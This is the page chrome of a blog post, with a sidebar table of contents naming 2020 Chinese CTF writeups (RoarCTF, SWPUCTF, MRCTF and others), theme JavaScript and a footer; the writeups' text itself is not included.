    <svg xmlns="http://www.w3.org/2000/svg" width="22" height="22" fill="currentColor" viewBox="0 0 24 24"><path fill="none" d="M0 0h24v24H0V0z"/><path d="M15.5 14h-.79l-.28-.27c1.2-1.4 1.82-3.31 1.48-5.34-.47-2.78-2.79-5-5.59-5.34-4.23-.52-7.79 3.04-7.27 7.27.34 2.8 2.56 5.12 5.34 5.59 2.03.34 3.94-.28 5.34-1.48l.27.28v.79l4.25 4.25c.41.41 1.08.41 1.49 0 .41-.41.41-1.08 0-1.49L15.5 14zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z"/></svg>
  </span>
  <input id="search" aria-label="Site Search" class="input" type="text" placeholder="Search" autocomplete="off">
  <div id="search-results" class="dropdown">
    <div id="search-menu" class="dropdown-menu" role="menu">
    </div>
  </div>
</div>


    </div>
  </div>
</main>


<aside class="single__side main-side">
  


<section class="sidebar hide">
  <script>document.querySelector('.sidebar').classList.remove('hide')</script>
  <div class="toc__flexbox" data-position="fixed">
    <h6 class="toc__title" data-ani="true">What&#39;s on this Page</h6>
    
      <label class="switch" data-ani="true">
        <input id="toggle-toc" aria-label="Toggle TOC" type="checkbox" checked>
        <span class="slider round"></span>
      </label>
    
  </div>
  <div class="toc " data-dir="ltr" data-folding="true" data-ani="true">
    <nav id="TableOfContents">
  <ul>
    <li><a href="#2020roarctf-misc-writeup">2020RoarCTF Misc Writeup</a>
      <ul>
        <li><a href="#签到">签到</a></li>
        <li><a href="#hi_433mhz">Hi_433MHz</a></li>
        <li><a href="#fm">FM</a></li>
      </ul>
    </li>
    <li><a href="#2020swpuctf-misccrypto-writeup">2020SWPUCTF Misc&amp;Crypto Writeup</a>
      <ul>
        <li><a href="#misc">Misc</a>
          <ul>
            <li><a href="#套娃">套娃</a></li>
            <li><a href="#耗子尾汁">耗子尾汁</a></li>
            <li><a href="#来找我吧">来找我吧</a></li>
            <li><a href="#来猜谜吧">来猜谜吧</a></li>
          </ul>
        </li>
        <li><a href="#crypto">Crypto</a>
          <ul>
            <li><a href="#happy">happy</a></li>
          </ul>
        </li>
      </ul>
    </li>
    <li><a href="#2020西湖论剑misc部分wp">2020西湖论剑Misc部分wp</a>
      <ul>
        <li><a href="#yusa_yyds">Yusa_yyds</a></li>
        <li><a href="#yusapapa">Yusapapa</a></li>
        <li><a href="#指鹿为马">指鹿为马</a></li>
        <li><a href="#barbar">Barbar</a></li>
      </ul>
    </li>
    <li><a href="#第一届太湖杯misc题解">第一届太湖杯Misc题解</a>
      <ul>
        <li><a href="#memory">memory</a></li>
        <li><a href="#misc-1">misc</a></li>
        <li><a href="#broken_secret">broken_secret</a></li>
      </ul>
    </li>
    <li><a href="#2020mrctf-writeup">2020MRCTF writeup</a>
      <ul>
        <li><a href="#ez_bypass">ez_bypass</a></li>
        <li><a href="#你传你呢">你传你🐎呢</a></li>
        <li><a href="#pywebsite">PYwebsite</a></li>
        <li><a href="#套娃-1">套娃</a></li>
        <li><a href="#ezaudit">Ezaudit</a></li>
        <li><a href="#ezpop">Ezpop</a></li>
        <li><a href="#ezpop_revenge">Ezpop_Revenge</a></li>
      </ul>
    </li>
    <li><a href="#2020安洵杯misccrypto-writeup">2020安洵杯Misc&amp;Crypto writeup</a>
      <ul>
        <li><a href="#misc-2">Misc</a>
          <ul>
            <li><a href="#签到-1">签到</a></li>
            <li><a href="#王牌特工">王牌特工</a></li>
            <li><a href="#套娃-2">套娃</a></li>
            <li><a href="#becare4">BeCare4</a></li>
          </ul>
        </li>
        <li><a href="#crypto-1">Crypto</a>
          <ul>
            <li><a href="#密码学爆破就行了">密码学？爆破就行了</a></li>
            <li><a href="#easyaes">easyaes</a></li>
            <li><a href="#easyrsa">easyrsa</a></li>
          </ul>
        </li>
      </ul>
    </li>
  </ul>
</nav>
  </div>
</section>



</aside>

<script>
  
  
  

  var enableToc = JSON.parse("true");
  var toc = JSON.parse("null");
  var tocPosition = JSON.parse("\"inner\"");
  
  var singleMainElem = document.querySelector('.single__main');
  var singleSideElem = document.querySelector('.single__side');

  enquire.register("screen and (max-width: 769px)", {
    match: function () {
      if ((enableToc || toc) && tocPosition !== "outer") {
        if (singleMainElem && singleSideElem) {
          singleMainElem.classList.remove('main-main');
          singleMainElem.classList.add('main');
          singleSideElem.classList.remove('main-side');
          singleSideElem.classList.add('hide');
        }
      } else if (tocPosition === "outer") {
        if (singleMainElem && !singleMainElem.classList.contains('main-main')) {
          singleMainElem.classList.remove('main-main');
          singleMainElem.classList.add('main');
        }
        if (singleSideElem && !singleSideElem.classList.contains('hide')) {
          singleSideElem.classList.add('hide');
        }
      }
    },
    unmatch: function () {
      if ((enableToc || toc) && tocPosition !== "outer") {
        singleMainElem.classList.remove('main');
        singleMainElem.classList.add('main-main');
        singleSideElem.classList.remove('hide');
        singleSideElem.classList.add('main-side');
      } else if (tocPosition === "outer") {
        if (singleMainElem && !singleMainElem.classList.contains('main-main')) {
          singleMainElem.classList.remove('main-main');
          singleMainElem.classList.add('main');
        }
        if (singleSideElem && !singleSideElem.classList.contains('hide')) {
          singleSideElem.classList.add('hide');
        }
      }

      var navCollapseBtn = document.querySelector('.navbar__burger');
      var navCollapse = document.getElementsByClassName('navbarm__collapse')[0];
      if (navCollapse) {
        navCollapse.setAttribute('data-open', false);
        navCollapse.style.maxHeight = 0;
        navCollapseBtn.classList.remove('is-active');
      }
      document.getElementsByClassName('navbar__menu')[0].classList.remove('is-active');
      document.getElementsByClassName('mobile-search')[0].classList.add('hide');
    },
    setup: function () { },
    deferSetup: true,
    destroy: function () { },
  });
</script>





<script defer src="/js/helper/getParents.min.js"></script>

<script defer src="/js/helper/closest.min.js"></script>

<script defer src="/js/helper/prev.min.js"></script>

<script defer src="/js/helper/prop.min.js"></script>

<script defer src="/js/helper/fadeinout.min.js"></script>

<script defer src="/js/helper/throttle.min.js"></script>






































  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.11.1/dist/katex.min.css" integrity="sha256-V8SV2MO1FUb63Bwht5Wx9x6PVHNa02gv8BgH/uH3ung=" crossorigin="anonymous">
  <script defer src="https://cdn.jsdelivr.net/npm/katex@0.11.1/dist/katex.min.js" integrity="sha256-F/Xda58SPdcUCr&#43;xhSGz9MA2zQBPb0ASEYKohl8UCHc=" crossorigin="anonymous"></script>
  <script defer src="https://cdn.jsdelivr.net/npm/katex@0.11.1/dist/contrib/auto-render.min.js" integrity="sha256-90d2pnfw0r4K8CZAWPko4rpFXQsZvJhTBGYNkipDprI=" crossorigin="anonymous"></script>














<script>
  'use strict';

  window.onload = function() {
    var navbar = document.querySelector('.navbar');
    var singleContentsElem = document.querySelector('.single__contents');

    
    
    
    var enableBusuanzi = JSON.parse("true");
    var busuanziPagePV = JSON.parse("true");
    
    if (enableBusuanzi && busuanziPagePV) {
      var pagePvElem = document.querySelector('#busuanzi_value_page_pv');
      pagePvElem.textContent = pagePvElem.textContent.replace(/(\d)(?=(\d\d\d)+(?!\d))/g, "$1,");
    }    
    



    
    
    
    
    
    
    var enableToc = JSON.parse("true");
    var toc = JSON.parse("null");
    var hideToc = JSON.parse("false");
    var tocFlexbox = document.querySelector('.toc__flexbox');
    var tocFlexboxOuter = document.querySelector('.toc__flexbox--outer');
    var tocFolding = JSON.parse("true");
    
    if ((enableToc || toc) && document.querySelector('.toc')) {
      var tableOfContentsElem = document.querySelector('.toc').querySelector('#TableOfContents');

      tableOfContentsElem.onmouseenter = function() {
        if (navbar.classList.contains('scrolling')) {
          navbar.classList.remove('scrolling');
        }
      }

      tableOfContentsElem.onmouseleave = function() {
        if (!navbar.classList.contains('scrolling')) {
          navbar.classList.add('scrolling');
        }
      }

      if (false === tocFolding) {

      } else {
        tableOfContentsElem.querySelectorAll('ul') ?
          tableOfContentsElem.querySelectorAll('ul').forEach(function (rootUl) {
            rootUl.querySelectorAll('li').forEach(function (liElem) {
              liElem.querySelectorAll('ul').forEach(function (ulElem) {
                ulElem.style.display = 'none';
              });
            });
          }) : null;
      }

      if (tableOfContentsElem) {
        if (tableOfContentsElem.querySelectorAll('a').length > 0) {
          tableOfContentsElem.querySelectorAll('a').forEach(function (elem) {
            elem.addEventListener('click', function () {
              var id = elem.getAttribute('id');

              if (!navbar.classList.contains('scrolling')) {
                navbar.classList.remove('navbar--show');
                navbar.classList.remove('navbar--hide');
                navbar.classList.add('navbar--hide');
              }
              
              document.querySelector('.toc').querySelectorAll('a').forEach(function (elem) {
                elem.classList.remove('active');
              });
              elem.classList.add('active');

              var curElem = tableOfContentsElem.querySelector('[href="#' + id + '"]');
              if (curElem && curElem.nextElementSibling) {
                curElem.nextElementSibling.style.display = 'block';
              }
              if (curElem) {
                getParents(curElem, 'ul') ?
                  getParents(curElem, 'ul').forEach(function (elem) {
                    elem.style.display = 'block';
                  }) : null;
              }
            });
          });
        } else {
          if (tocFlexbox) {
            tocFlexbox.setAttribute('data-position', '');
            if (!tocFlexbox.classList.contains('hide')) {
              tocFlexbox.classList.add('hide');
            }
          }
          if (tocFlexboxOuter) {
            tocFlexboxOuter.setAttribute('data-position', '');
            if (!tocFlexboxOuter.classList.contains('hide')) {
              tocFlexboxOuter.classList.add('hide');
            }
          }
        }
      }

      
      var toggleTocElem = document.getElementById("toggle-toc");
      var visibleTocElem = document.getElementById('visible-toc');
      var tocElem = document.querySelector('.toc');
      var mainElem = document.querySelector('main');
      var sideElem = document.querySelector('side');
      var tocFlexboxElem = document.querySelector('.toc__flexbox');

      toggleTocElem ? 
      toggleTocElem.addEventListener('change', function(e) {
        if (e.target.checked) {
          if (tocElem) {
            fadeIn(tocElem, 200);
          }
          if (tocFlexboxElem) {
            tocFlexboxElem.setAttribute('data-position', 'fixed');
          }

          if (mainElem) {
            mainElem.classList.remove('main-main');
            mainElem.classList.remove('main');
            mainElem.classList.add('main-main');
          }
          if (sideElem) {
            sideElem.classList.remove('main-side');
          }
        } else {
          if (tocElem) {
            fadeOut(tocElem, 200);
          }
          if (tocFlexboxElem) {
            tocFlexboxElem.setAttribute('data-position', 'absolute');
          }

          if (mainElem) {
            mainElem.classList.remove('main-main');
            mainElem.classList.remove('main');
            mainElem.classList.add('main');
          }
          if (sideElem) {
            sideElem.classList.remove('main-side');
          }
        }
      }) : null;

      visibleTocElem ?
      visibleTocElem.addEventListener('change', function(e) {
        if (e.target.checked) {
          if (tocElem) {
            fadeIn(tocElem, 200);
          }
        } else {
          if (tocElem) {
            fadeOut(tocElem, 200);
          }
        }
      }) : null;
    }
    
    
    
    
    
    var topOffset = 120;
    var botOffset = 70;
    var handleWindowResize = function () {
      if (tocElem) {
        tocElem.style.maxHeight = (window.innerHeight - topOffset - botOffset) + 'px';
      }
    }
    var throttledWindowResize = throttle(handleWindowResize, 300);
    throttledWindowResize()

    
    window.addEventListener('resize', throttledWindowResize);
    



    
    var text, clip = new ClipboardJS('.anchor');
    var headers = singleContentsElem.querySelectorAll("h1, h2, h3, h4");

    
    var languagedir = JSON.parse("\"ltr\"");

    headers ? 
    headers.forEach(function (elem) {
      var size = parseInt(elem.tagName.substr(1), 10) * 2;
      var url = encodeURI(document.location.origin + document.location.pathname);
      var link = url + "#" + elem.getAttribute('id');
      var newElemOuter = document.createElement('span');
      newElemOuter.classList.add('anchor');
      newElemOuter.classList.add('hide');
      newElemOuter.setAttribute('data-clipboard-text', decodeURI(link));
      newElemOuter.style.position = 'relative';

      var newElemInner = document.createElement('span');
      newElemInner.style.position = 'absolute';
      newElemInner.style.top = '50%';
      newElemInner.style.left = '0.75rem';
      newElemInner.style.transform = 'translateY(-50%)';
      newElemInner.innerHTML = `
<svg fill="currentColor" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="${32 - size}px" height="${32 - size}px"><path d="M 5.5625 0 C 4.136719 0 2.707031 0.542969 1.625 1.625 C -0.539063 3.789063 -0.539063 7.335938 1.625 9.5 L 5.28125 13.15625 C 5.667969 13.554688 6.304688 13.558594 6.703125 13.171875 C 7.101563 12.785156 7.105469 12.148438 6.71875 11.75 L 3.03125 8.0625 C 1.632813 6.664063 1.632813 4.429688 3.03125 3.03125 C 4.429688 1.632813 6.664063 1.632813 8.0625 3.03125 L 12.96875 7.9375 C 14.367188 9.335938 14.367188 11.570313 12.96875 12.96875 C 12.804688 13.132813 12.621094 13.25 12.4375 13.375 C 11.980469 13.6875 11.859375 14.308594 12.171875 14.765625 C 12.484375 15.222656 13.105469 15.34375 13.5625 15.03125 C 13.847656 14.835938 14.125 14.625 14.375 14.375 C 16.539063 12.210938 16.539063 8.664063 14.375 6.5 L 9.5 1.625 C 8.417969 0.542969 6.988281 0 5.5625 0 Z M 10.78125 8.875 C 10.738281 8.882813 10.695313 8.894531 10.65625 8.90625 C 10.507813 8.9375 10.371094 9 10.25 9.09375 C 10.039063 9.253906 9.820313 9.429688 9.625 9.625 C 7.460938 11.789063 7.460938 15.335938 9.625 17.5 L 14.5 22.375 C 16.664063 24.539063 20.210938 24.539063 22.375 22.375 C 24.539063 20.210938 24.539063 16.664063 22.375 14.5 L 18.71875 10.875 C 18.476563 10.578125 18.089844 10.441406 17.714844 10.527344 C 17.34375 10.613281 17.050781 10.90625 16.964844 11.277344 C 16.878906 11.652344 17.015625 12.039063 17.3125 12.28125 L 20.96875 15.9375 C 22.367188 17.335938 22.367188 19.570313 20.96875 20.96875 C 19.570313 22.367188 17.335938 22.367188 15.9375 20.96875 L 11.03125 16.0625 C 9.632813 14.664063 9.632813 12.429688 11.03125 11.03125 C 11.152344 10.90625 11.300781 10.820313 11.4375 10.71875 C 11.839844 10.472656 12.015625 9.976563 11.855469 9.53125 C 11.699219 9.085938 11.25 8.8125 10.78125 8.875 Z"/></svg>`;

      if (languagedir === "rtl") {
        newElemInner.style.left = '-2rem';
      } else {
        newElemInner.style.right = '-2rem';
      }

      newElemOuter.append(newElemInner);
      elem.append(newElemOuter);

      elem.addEventListener('mouseenter', function() {
        this.querySelector('.anchor').classList.remove('hide');
      });
      elem.addEventListener('mouseleave', function () {
        this.querySelector('.anchor').classList.add('hide');
      });
    }) : null;

    document.querySelectorAll('.anchor').forEach(function(elem) {
      elem.addEventListener('mouseleave', function() {
        elem.setAttribute('aria-label', null);
        elem.classList.remove('tooltipped');
        elem.classList.remove('tooltipped-s');
        elem.classList.remove('tooltipped-w');
      });
    });

    clip.on('success', function (e) {
      e.clearSelection();
      e.trigger.setAttribute('aria-label', 'Link copied to clipboard!');
      e.trigger.classList.add('tooltipped');
      e.trigger.classList.add('tooltipped-s');
    });
    // =================================================================



    
    
    var lib = JSON.parse("[\"katex\"]");

    if (lib && lib.includes('mermaid')) {
      
      var themeVariant = localStorage.getItem('theme') || JSON.parse("\"dark\"");

      if (themeVariant === "dark" || themeVariant === "hacker") {
        mermaid.initialize({ theme: 'dark' });
      } else {
        mermaid.initialize({ theme: 'default' });
      }
      
      var mermaids = [];
      [].push.apply(mermaids, document.getElementsByClassName('language-mermaid'));
      mermaids.forEach(function(elem) {
        var elemParentNode = elem.parentNode;

        if (elemParentNode !== document.body) {
          elemParentNode.parentNode.insertBefore(elem, elemParentNode);
          elemParentNode.parentNode.removeChild(elemParentNode);
        }

        var newElemWrapper = document.createElement('div');
        newElemWrapper.classList.add('mermaid');
        newElemWrapper.style.padding = '34px 4px 6px';
        newElemWrapper.innerHTML = elem.innerHTML;
        elem.replaceWith(newElemWrapper);
      });
    }
    

    

    
    if (lib && lib.includes('katex')) {
      var mathElements = document.getElementsByClassName('math');
      var options = {
        delimiters: [
          { left: "$$", right: "$$", display: true },
          { left: "\\[", right: "\\]", display: true },
          { left: "$", right: "$", display: false },
          { left: "\\(", right: "\\)", display: false }
        ],
      };

      renderMathInElement(document.querySelector('.single__contents'), options);
    }
    



    
    if (lib && lib.includes('flowchartjs')) {
      
      var options = JSON.parse("{\"arrow-end\":\"block\",\"element-color\":\"black\",\"fill\":\"white\",\"flowstate\":{\"approved\":{\"fill\":\"#58C4A3\",\"font-size\":12,\"no-text\":\"n/a\",\"yes-text\":\"APPROVED\"},\"current\":{\"fill\":\"yellow\",\"font-color\":\"red\",\"font-weight\":\"bold\"},\"future\":{\"fill\":\"#FFFF99\"},\"invalid\":{\"fill\":\"#444444\"},\"past\":{\"fill\":\"#CCCCCC\",\"font-size\":12},\"rejected\":{\"fill\":\"#C45879\",\"font-size\":12,\"no-text\":\"REJECTED\",\"yes-text\":\"n/a\"},\"request\":{\"fill\":\"blue\"}},\"font-color\":\"black\",\"font-size\":14,\"line-color\":\"black\",\"line-length\":50,\"line-width\":3,\"no-text\":\"no\",\"scale\":1,\"symbols\":{\"end\":{\"class\":\"end-element\"},\"start\":{\"element-color\":\"green\",\"fill\":\"yellow\",\"font-color\":\"red\"}},\"text-margin\":10,\"x\":0,\"y\":0,\"yes-text\":\"yes\"}");
      var jsonContent = null;

      var flowchartPrefix = "language-flowchart";
      var index = 0;
      Array.prototype.forEach.call(document.querySelectorAll("[class^=" + flowchartPrefix + "]"), function(x){
          x.style.display = 'none'
          x.parentNode.style.backgroundColor = "transparent"
          jsonContent = x.innerText;

          var node0 = document.createElement('div');
          node0.id = 'flowchart' + index;
          x.parentNode.insertBefore(node0, x);

          var diagram = flowchart.parse(jsonContent);
          diagram.drawSVG("flowchart"+index, options);

          index +=1;
      });      
    }
    

    

    
    document.querySelectorAll("mjx-container").forEach(function (x) {
      x.parentElement.classList += 'has-jax'
    });
    



    
    if (lib && lib.includes('msc')) {
      
      var options = JSON.parse("{\"theme\":\"hand\"}");
      var jsonContent = null;

      var index = 0;
      var chartPrefix = "language-msc";
      Array.prototype.forEach.call(document.querySelectorAll("[class^=" + chartPrefix + "]"), function (x) {
        x.style.display = 'none'
        x.parentNode.style.backgroundColor = "transparent"
        jsonContent = x.innerText;
        var node0 = document.createElement('div');
        node0.id = 'msc' + index;
        x.parentNode.insertBefore(node0, x);
        var diagram = Diagram.parse(jsonContent);
        diagram.drawSVG("msc" + index, options);
        index += 1;
      });
    }
    



    
    if (lib && lib.includes('chart')) {
      var borderColor = "#666";
      var bgColor = "#ddd";
      var borderWidth = 2;

      Chart.defaults.global.elements.rectangle.borderWidth = borderWidth;
      Chart.defaults.global.elements.rectangle.borderColor = borderColor;
      Chart.defaults.global.elements.rectangle.backgroundColor = bgColor;

      Chart.defaults.global.elements.line.borderWidth = borderWidth;
      Chart.defaults.global.elements.line.borderColor = borderColor;
      Chart.defaults.global.elements.line.backgroundColor = bgColor;

      Chart.defaults.global.elements.point.borderWidth = borderWidth;
      Chart.defaults.global.elements.point.borderColor = borderColor;
      Chart.defaults.global.elements.point.backgroundColor = bgColor;

      var chartPrefix = "language-chart";
      var index = 0;
      var jsonContent = null;

      Array.prototype.forEach.call(document.querySelectorAll("[class^=" + chartPrefix + "]"), function (x) {
        x.style.display = 'none'
        x.parentNode.style.backgroundColor = "transparent"
        jsonContent = x.innerText;
        var node0 = document.createElement('canvas');
        var source = null;
        node0.height = 200;
        node0.style.height = 200;
        node0.id = 'myChart' + index;
        source = JSON.parse(jsonContent);
        x.parentNode.insertBefore(node0, x);
        var ctx = document.getElementById('myChart' + index).getContext('2d');
        var myChart = new Chart(ctx, source);
        index += 1;
      });            
    }
    



    
    if (lib && lib.includes('wavedrom')) {
      var wavePrefix = "language-wave";
      var index = 0;
      var jsonContent = null;
      
      Array.prototype.forEach.call(document.querySelectorAll("[class^=" + wavePrefix + "]"), function (x) {
        x.style.display = 'none'
        x.parentNode.style.backgroundColor = "transparent"
        jsonContent = x.innerText;
        var node0 = document.createElement('div');
        var source = null;
        node0.id = 'WaveDrom_Display_' + index;
        source = JSON.parse(jsonContent);
        x.parentNode.insertBefore(node0, x);
        WaveDrom.RenderWaveForm(index, source, "WaveDrom_Display_");
        index += 1;
      });
    }
    



    
    if (lib && lib.includes('viz')) {
      var vizPrefix = "language-viz-";
      Array.prototype.forEach.call(document.querySelectorAll("[class^=" + vizPrefix + "]"), function (x) {
        x.style.display = 'none'
        x.parentNode.style.backgroundColor = "transparent"
        var engine;
        x.getAttribute("class").split(" ").forEach(function (cls) {
          if (cls.startsWith(vizPrefix)) {
            engine = cls.substr(vizPrefix.length);
          }
        });
        var viz = new Viz();
        viz.renderSVGElement(x.innerText, { engine: engine })
          .then(function (element) {
            element.style.width = "100%";
            x.parentNode.insertBefore(element, x);
          })
      });
    }
    
    
  }
</script>


            
            <footer class="footer">
    
<div class="dropdown">
  <button class="dropdown-trigger" aria-label="Select Language Button">
    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path fill="none" d="M0 0h24v24H0V0z"/><path fill="currentColor" d="M12.65 15.67c.14-.36.05-.77-.23-1.05l-2.09-2.06.03-.03c1.74-1.94 2.98-4.17 3.71-6.53h1.94c.54 0 .99-.45.99-.99v-.02c0-.54-.45-.99-.99-.99H10V3c0-.55-.45-1-1-1s-1 .45-1 1v1H1.99c-.54 0-.99.45-.99.99 0 .55.45.99.99.99h10.18C11.5 7.92 10.44 9.75 9 11.35c-.81-.89-1.49-1.86-2.06-2.88-.16-.29-.45-.47-.78-.47-.69 0-1.13.75-.79 1.35.63 1.13 1.4 2.21 2.3 3.21L3.3 16.87c-.4.39-.4 1.03 0 1.42.39.39 1.02.39 1.42 0L9 14l2.02 2.02c.51.51 1.38.32 1.63-.35zM17.5 10c-.6 0-1.14.37-1.35.94l-3.67 9.8c-.24.61.22 1.26.87 1.26.39 0 .74-.24.88-.61l.89-2.39h4.75l.9 2.39c.14.36.49.61.88.61.65 0 1.11-.65.88-1.26l-3.67-9.8c-.22-.57-.76-.94-1.36-.94zm-1.62 7l1.62-4.33L19.12 17h-3.24z"/></svg>
  </button>
  <div class="dropdown-content">
    
    
    
  </div>
</div>

    
    
<div id="gtt">
  <div class="gtt">
    <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" d="M8.12 14.71L12 10.83l3.88 3.88c.39.39 1.02.39 1.41 0 .39-.39.39-1.02 0-1.41L12.7 8.71c-.39-.39-1.02-.39-1.41 0L6.7 13.3c-.39.39-.39 1.02 0 1.41.39.38 1.03.39 1.42 0z"/></svg>
  </div>
</div>

    <hr />

    <div class="basicflex flexwrap">
        
            
        
            
        
    </div>

    <div class="footer__poweredby">
        
  <div class="busuanzi">
    
    
      <div class="busuanzi__item">
        <span class="busuanzi__item--label">
          Total visitors
        </span>
        <span id="busuanzi_value_site_uv" class="busuanzi__item--number">...</span>
      </div>
    

    
      <div class="busuanzi__item">
        <span class="busuanzi__item--label">
          Total views
        </span>
        <span id="busuanzi_value_site_pv" class="busuanzi__item--number">...</span>
      </div>
    

  </div>

                
            <p class="caption">
                
                    ©2023, All Rights Reserved
                
            </p>
        

        
        
    </div> 
</footer>
        </div>
        





<div class="wrapper__right hide" data-pad="true" dir="ltr">
  <script>document.querySelector('.wrapper__right').classList.remove('hide')</script>
  
</div>

    </div>
</body>

</html>